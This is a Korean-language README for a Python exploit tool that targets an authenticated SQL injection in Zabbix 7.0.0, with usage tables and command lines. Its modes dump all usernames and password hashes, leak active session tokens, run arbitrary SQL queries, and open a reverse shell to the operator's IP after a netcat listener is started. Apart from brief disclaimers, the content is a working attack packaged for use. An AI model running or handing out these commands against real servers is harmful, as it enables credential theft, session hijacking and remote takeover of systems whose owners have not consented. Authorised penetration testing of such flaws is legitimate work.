
이는 교육 목적으로만 사용됩니다. 인가되지 않은 시스템에 대해 사용하지 마십시오.
Zabbix 7.0.0 인증된 SQL 인젝션 취약점을 익스플로잇하는 파이썬 스크립트로, 사용자 데이터 추출, 세션 토큰 유출, 원격 명령 실행(RCE), 사용자 정의 쿼리 인젝션 등 여러 동작 모드를 지원합니다.
⚠️ 면책 조항:
이 스크립트는 교육 및 승인된 침투 테스트 목적으로만 사용됩니다.
소유하지 않거나 테스트에 대한 명시적 허가가 없는 시스템에서는 사용하지 마십시오.
저자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.
requests 라이브러리필요시 요구 사항 설치:
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
| 모드 | 설명 | 관리자 토큰 필요 |
|---|---|---|
| leak-users | 모든 사용자 ID, 사용자명, 비밀번호 해시, 역할 덤프 | ❌ |
| leak-tokens | 데이터베이스에서 모든 활성 세션 ID 덤프 | ❌ |
| rce | item.create 익스플로잇을 통해 리버스 셸 생성 | ✅ |
| custom | 인젝션을 통해 모든 사용자 정의 SQL 쿼리 실행 | ❌ |
사용자 해시 덤프
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
세션 토큰 유출
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
원격 코드 실행 (리버스 셸)
# Start a listener first:
nc -lvnp 9001
# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
사용자 정의 SQL 인젝션
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # Main exploit script
README.md # This documentation
Anthony (@874anthony)
사랑과 호기심으로 제작 🐍
이 프로젝트는 MIT 라이선스 하에 배포됩니다. 책임감 있게 사용해 주세요.